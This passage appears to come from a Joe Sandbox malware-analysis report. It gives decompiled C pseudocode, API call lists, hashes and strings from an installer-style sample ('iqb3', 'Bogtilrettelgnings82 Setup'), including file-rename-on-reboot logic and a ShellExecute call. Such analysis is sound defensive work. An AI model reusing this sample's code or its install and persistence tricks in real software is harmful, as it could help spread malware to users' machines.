                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 7411a04c3bdd138215f4fbedaa66117d5148ebc289ac93fdb3f5d6d7506025b5
                                                                      • Instruction ID: db1172372b73d17c9e5c842b05e6fc1add0f007f89b28e5155f99bf94e6db886
                                                                      • Opcode Fuzzy Hash: 7411a04c3bdd138215f4fbedaa66117d5148ebc289ac93fdb3f5d6d7506025b5
                                                                      • Instruction Fuzzy Hash: 63F0A772508114ABE700E7749949AEE7768DF51314F60457BE141F60C1D3B84941DB2A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404115 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E00404115(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41ecac =  *0x41ecac + 1;
								__eflags =  *0x41ecac;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404033(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x422680;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x4236e8, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x4236e8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41ecac; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x41f4b8; // 0x56f0e4
					_t25 = _t103 + 0x14; // 0x56f0f8
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00403FEE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E0040439F();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x422ebc; // 0x5707f3
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x423718;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004040E0;
					E00403FCC(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00403FCC(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00403FEE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00404001(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x4236f0 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41ecac = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41ecac = 0;
					return 0;
				}
			}




















                                                                      0x00404125
                                                                      0x00404237
                                                                      0x0040424a
                                                                      0x004042a6
                                                                      0x004042a6
                                                                      0x004042aa
                                                                      0x0040437a
                                                                      0x00404381
                                                                      0x00404383
                                                                      0x00404383
                                                                      0x00404383
                                                                      0x00404389
                                                                      0x00404389
                                                                      0x0040438c
                                                                      0x00000000
                                                                      0x00404393
                                                                      0x004042b8
                                                                      0x004042ba
                                                                      0x004042bd
                                                                      0x004042c4
                                                                      0x004042c6
                                                                      0x004042cd
                                                                      0x004042cf
                                                                      0x004042d2
                                                                      0x004042d5
                                                                      0x004042da
                                                                      0x004042e0
                                                                      0x004042e3
                                                                      0x004042ea
                                                                      0x004042f8
                                                                      0x00404310
                                                                      0x00404323
                                                                      0x00404333
                                                                      0x00404335
                                                                      0x00404335
                                                                      0x004042ea
                                                                      0x004042cd
                                                                      0x00404338
                                                                      0x0040433f
                                                                      0x00000000
                                                                      0x00404341
                                                                      0x00404341
                                                                      0x00404348
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040434a
                                                                      0x0040434e
                                                                      0x0040435f
                                                                      0x0040435f
                                                                      0x00404361
                                                                      0x00404365
                                                                      0x00404373
                                                                      0x00404373
                                                                      0x00000000
                                                                      0x00404377
                                                                      0x0040433f
                                                                      0x00404252
                                                                      0x00404255
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040425d
                                                                      0x00404263
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404269
                                                                      0x0040426f
                                                                      0x0040426f
                                                                      0x00404272
                                                                      0x00404275
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404298
                                                                      0x00404298
                                                                      0x0040429a
                                                                      0x0040429c
                                                                      0x004042a1
                                                                      0x00000000
                                                                      0x0040412b
                                                                      0x0040412b
                                                                      0x0040412e
                                                                      0x00404133
                                                                      0x00404135
                                                                      0x00404144
                                                                      0x00404144
                                                                      0x0040414b
                                                                      0x0040414e
                                                                      0x00404150
                                                                      0x00404155
                                                                      0x0040415e
                                                                      0x00404164
                                                                      0x00404170
                                                                      0x00404173
                                                                      0x0040417c
                                                                      0x00404181
                                                                      0x00404184
                                                                      0x00404189
                                                                      0x004041a0
                                                                      0x004041a7
                                                                      0x004041ba
                                                                      0x004041bd
                                                                      0x004041d2
                                                                      0x004041d9
                                                                      0x004041de
                                                                      0x004041e3
                                                                      0x004041e3
                                                                      0x004041f2
                                                                      0x00404201
                                                                      0x00404213
                                                                      0x00404218
                                                                      0x00404228
                                                                      0x0040422a
                                                                      0x00000000
                                                                      0x00404230

                                                                      APIs
                                                                      • CheckDlgButton.USER32 ref: 004041A0
                                                                      • GetDlgItem.USER32 ref: 004041B4
                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041D2
                                                                      • GetSysColor.USER32(?), ref: 004041E3
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041F2
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404201
                                                                      • lstrlenA.KERNEL32(?), ref: 00404204
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404213
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404228
                                                                      • GetDlgItem.USER32 ref: 0040428A
                                                                      • SendMessageA.USER32(00000000), ref: 0040428D
                                                                      • GetDlgItem.USER32 ref: 004042B8
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042F8
                                                                      • LoadCursorA.USER32 ref: 00404307
                                                                      • SetCursor.USER32(00000000), ref: 00404310
                                                                      • ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,00000001), ref: 00404323
                                                                      • LoadCursorA.USER32 ref: 00404330
                                                                      • SetCursor.USER32(00000000), ref: 00404333
                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040435F
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404373
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$N$open$@@
                                                                      • API String ID: 3615053054-47883351
                                                                      • Opcode ID: 968b0e608722a5a4807cbf1cbf6d651574c4be42df1e23b0a274a5bf77e584f7
                                                                      • Instruction ID: 7e55316eb6edc40c7699564df6a93aee63aedbce2365efaa8751590eb61f664c
                                                                      • Opcode Fuzzy Hash: 968b0e608722a5a4807cbf1cbf6d651574c4be42df1e23b0a274a5bf77e584f7
                                                                      • Instruction Fuzzy Hash: C561A2B1A40305BFEB109F61CC45F6A7B69FB84715F10802AFA05BA2D1C7B8A951CF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x4236f0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Bogtilrettelgnings82 Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x4236e8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                      0x0040100a
                                                                      0x00401039
                                                                      0x00401047
                                                                      0x0040104d
                                                                      0x00401051
                                                                      0x0040105b
                                                                      0x00401061
                                                                      0x00401064
                                                                      0x004010f3
                                                                      0x00401089
                                                                      0x0040108c
                                                                      0x004010a6
                                                                      0x004010bd
                                                                      0x004010cc
                                                                      0x004010cf
                                                                      0x004010d5
                                                                      0x004010d9
                                                                      0x004010e4
                                                                      0x004010ed
                                                                      0x004010ef
                                                                      0x004010ef
                                                                      0x00401100
                                                                      0x00401105
                                                                      0x0040110d
                                                                      0x00401110
                                                                      0x00401112
                                                                      0x00401118
                                                                      0x0040111f
                                                                      0x00401126
                                                                      0x00401130
                                                                      0x00401142
                                                                      0x00401156
                                                                      0x00401160
                                                                      0x00401165
                                                                      0x00401165
                                                                      0x00401110
                                                                      0x0040116e
                                                                      0x00000000
                                                                      0x00401178
                                                                      0x00401010
                                                                      0x00401013
                                                                      0x00401015
                                                                      0x0040101f
                                                                      0x0040101f
                                                                      0x00000000

                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32 ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32 ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,Bogtilrettelgnings82 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: Bogtilrettelgnings82 Setup$F
                                                                      • API String ID: 941294808-2905091986
                                                                      • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                      • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                                      • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                      • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405A16 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405A16() {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				long _t14;
				long _t26;
				char* _t34;
				int _t40;
				void* _t41;
				intOrPtr* _t42;
				long _t45;
				CHAR* _t47;
				void* _t49;
				void* _t51;
				void* _t52;
				void* _t55;
				void* _t56;

				lstrcpyA(0x421a70, "NUL");
				_t47 =  *(_t55 + 0x1c);
				if(_t47 == 0) {
					L3:
					_t14 = GetShortPathNameA( *(_t55 + 0x20), 0x421e70, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t40 = wsprintfA(0x421670, "%s=%s\r\n", 0x421a70, 0x421e70);
						_t56 = _t55 + 0x10;
						E00405D00(_t40, 0x421a70, 0x421e70, 0x421e70,  *((intOrPtr*)( *0x4236f0 + 0x128)));
						_t14 = E0040596F(0x421e70, 0xc0000000, 4);
						_t51 = _t14;
						 *(_t56 + 0x1c) = _t51;
						if(_t51 != 0xffffffff) {
							_t45 = GetFileSize(_t51, 0);
							_t6 = _t40 + 0xa; // 0xa
							_t49 = GlobalAlloc(0x40, _t45 + _t6);
							if(_t49 == 0 || E004059E7(_t51, _t49, _t45) == 0) {
								L18:
								return CloseHandle(_t51);
							} else {
								if(E004058D4(_t41, _t49, "[Rename]\r\n") != 0) {
									_t52 = E004058D4(_t41, _t23 + 0xa, 0x409384);
									if(_t52 == 0) {
										_t51 =  *(_t56 + 0x1c);
										L16:
										_t26 = _t45;
										L17:
										E0040592A(_t26 + _t49, 0x421670, _t40);
										SetFilePointer(_t51, 0, 0, 0);
										WriteFile(_t51, _t49, _t45 + _t40, _t56 + 0x10, 0);
										GlobalFree(_t49);
										goto L18;
									}
									_t42 = _t49 + _t45;
									_t34 = _t42 + _t40;
									while(_t42 > _t52) {
										 *_t34 =  *_t42;
										_t34 = _t34 - 1;
										_t42 = _t42 - 1;
									}
									_t26 = _t52 - _t49 + 1;
									_t51 =  *(_t56 + 0x1c);
									goto L17;
								}
								lstrcpyA(_t49 + _t45, "[Rename]\r\n");
								_t45 = _t45 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040596F(_t47, 0, 1));
					_t14 = GetShortPathNameA(_t47, 0x421a70, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L3;
					}
				}
				return _t14;
			}




















                                                                      0x00405a26
                                                                      0x00405a2c
                                                                      0x00405a3d
                                                                      0x00405a65
                                                                      0x00405a70
                                                                      0x00405a74
                                                                      0x00405a94
                                                                      0x00405a9b
                                                                      0x00405aa5
                                                                      0x00405ab2
                                                                      0x00405ab7
                                                                      0x00405abc
                                                                      0x00405ac0
                                                                      0x00405acf
                                                                      0x00405ad1
                                                                      0x00405ade
                                                                      0x00405ae2
                                                                      0x00405b85
                                                                      0x00000000
                                                                      0x00405af8
                                                                      0x00405b05
                                                                      0x00405b29
                                                                      0x00405b2d
                                                                      0x00405b4c
                                                                      0x00405b50
                                                                      0x00405b50
                                                                      0x00405b52
                                                                      0x00405b5b
                                                                      0x00405b66
                                                                      0x00405b78
                                                                      0x00405b7f
                                                                      0x00000000
                                                                      0x00405b7f
                                                                      0x00405b2f
                                                                      0x00405b32
                                                                      0x00405b3d
                                                                      0x00405b39
                                                                      0x00405b3b
                                                                      0x00405b3c
                                                                      0x00405b3c
                                                                      0x00405b44
                                                                      0x00405b46
                                                                      0x00000000
                                                                      0x00405b46
                                                                      0x00405b10
                                                                      0x00405b16
                                                                      0x00000000
                                                                      0x00405b16
                                                                      0x00405ae2
                                                                      0x00405ac0
                                                                      0x00405a3f
                                                                      0x00405a4a
                                                                      0x00405a53
                                                                      0x00405a57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405a57
                                                                      0x00405b91

                                                                      APIs
                                                                      • lstrcpyA.KERNEL32(00421A70,NUL,?,00000000,?,00000000,?,00405BBA,?,?,00000001,0040575D,?,00000000,000000F1,?), ref: 00405A26
                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BBA,?,?,00000001,0040575D,?,00000000,000000F1,?), ref: 00405A4A
                                                                      • GetShortPathNameA.KERNEL32 ref: 00405A53
                                                                        • Part of subcall function 004058D4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058E4
                                                                        • Part of subcall function 004058D4: lstrlenA.KERNEL32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 00405916
                                                                      • GetShortPathNameA.KERNEL32 ref: 00405A70
                                                                      • wsprintfA.USER32 ref: 00405A8E
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405AC9
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405AD8
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B10
                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421670,00000000,-0000000A,00409384,00000000,[Rename],00000000,00000000,00000000), ref: 00405B66
                                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B78
                                                                      • GlobalFree.KERNEL32 ref: 00405B7F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405B86
                                                                        • Part of subcall function 0040596F: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\Public\iqb3.bat,80000000,00000003), ref: 00405973
                                                                        • Part of subcall function 0040596F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                      • String ID: %s=%s$NUL$[Rename]
                                                                      • API String ID: 1265525490-4148678300
                                                                      • Opcode ID: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                                      • Instruction ID: 2a91906f743b427df7c641563761ed76cd06f16afc5903481ab5df03799b8c64
                                                                      • Opcode Fuzzy Hash: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                                      • Instruction Fuzzy Hash: ED41CFB1604B15BFD2206B615C49F6B3A6CDB45764F14013AFD05B62D2EA7CBC018E7D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100023D6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E100023D6(void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t23;
				short* _t24;
				void* _t25;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				void* _t40;
				void* _t43;
				int _t48;
				void* _t49;
				void* _t55;
				void* _t56;
				short** _t57;
				intOrPtr _t58;
				short** _t61;
				void* _t62;

				_t55 = __edx;
				_t19 =  *((intOrPtr*)(_t62 + 8));
				_t58 =  *((intOrPtr*)(_t19 + 0x814));
				 *((intOrPtr*)(_t62 + 0x10)) = _t58;
				_t61 = (_t58 + 0x41 << 5) + _t19;
				do {
					if( *((intOrPtr*)(_t61 - 4)) != 0xffffffff) {
						_t57 = _t61;
					} else {
						_t57 =  *_t61;
					}
					_t56 = E10001215();
					_t48 = 0;
					_t22 =  *((intOrPtr*)(_t61 - 8));
					if(_t22 == 0) {
						 *_t56 =  *_t56 & 0x00000000;
					} else {
						_t30 = _t22 - 1;
						if(_t30 == 0) {
							_push( *_t57);
							goto L12;
						} else {
							_t32 = _t30 - 1;
							if(_t32 == 0) {
								E10001446(_t55,  *_t57, _t57[1], _t56);
								goto L13;
							} else {
								_t34 = _t32 - 1;
								if(_t34 == 0) {
									lstrcpynA(_t56,  *_t57,  *0x1000405c);
								} else {
									_t36 = _t34 - 1;
									if(_t36 == 0) {
										WideCharToMultiByte(0, 0,  *_t57,  *0x1000405c, _t56,  *0x1000405c - 1, 0, 0);
										 *( *0x1000405c + _t56 - 1) =  *( *0x1000405c + _t56 - 1) & 0x00000000;
									} else {
										_t40 = _t36 - 1;
										if(_t40 == 0) {
											_t43 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
											_push( *0x1000405c);
											_t49 = _t43;
											_push(_t49);
											_push( *_t57);
											" {3v@u3v"();
											WideCharToMultiByte(0, 0, _t49,  *0x1000405c, _t56,  *0x1000405c, 0, 0);
											GlobalFree(_t49);
											_t48 = 0;
										} else {
											if(_t40 == 1) {
												_push( *_t61);
												L12:
												wsprintfA(_t56, 0x10004000);
												L13:
												_t62 = _t62 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					_t23 = _t61[5];
					if(_t23 != _t48 && ( *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x18)))) != 2 ||  *((intOrPtr*)(_t61 - 4)) > _t48)) {
						GlobalFree(_t23);
					}
					_t24 = _t61[4];
					if(_t24 != _t48) {
						if(_t24 != 0xffffffff) {
							if(_t24 > _t48) {
								E100012E8(_t24 - 1, _t56);
								goto L29;
							}
						} else {
							E10001278(_t56);
							L29:
						}
					}
					_t25 = GlobalFree(_t56);
					 *((intOrPtr*)(_t62 + 0x10)) =  *((intOrPtr*)(_t62 + 0x10)) - 1;
					_t61 = _t61 - 0x20;
				} while ( *((intOrPtr*)(_t62 + 0x10)) >= _t48);
				return _t25;
			}






















                                                                      0x100023d6
                                                                      0x100023d7
                                                                      0x100023de
                                                                      0x100023e5
                                                                      0x100023ef
                                                                      0x100023f1
                                                                      0x100023f5
                                                                      0x100023fc
                                                                      0x100023f7
                                                                      0x100023f7
                                                                      0x100023f7
                                                                      0x10002403
                                                                      0x10002408
                                                                      0x1000240a
                                                                      0x1000240c
                                                                      0x100024d7
                                                                      0x10002412
                                                                      0x10002412
                                                                      0x10002413
                                                                      0x100024d0
                                                                      0x00000000
                                                                      0x10002419
                                                                      0x10002419
                                                                      0x1000241a
                                                                      0x100024c6
                                                                      0x00000000
                                                                      0x10002420
                                                                      0x10002420
                                                                      0x10002421
                                                                      0x100024b8
                                                                      0x10002427
                                                                      0x10002427
                                                                      0x10002428
                                                                      0x1000249d
                                                                      0x100024a8
                                                                      0x1000242a
                                                                      0x1000242a
                                                                      0x1000242b
                                                                      0x10002455
                                                                      0x1000245b
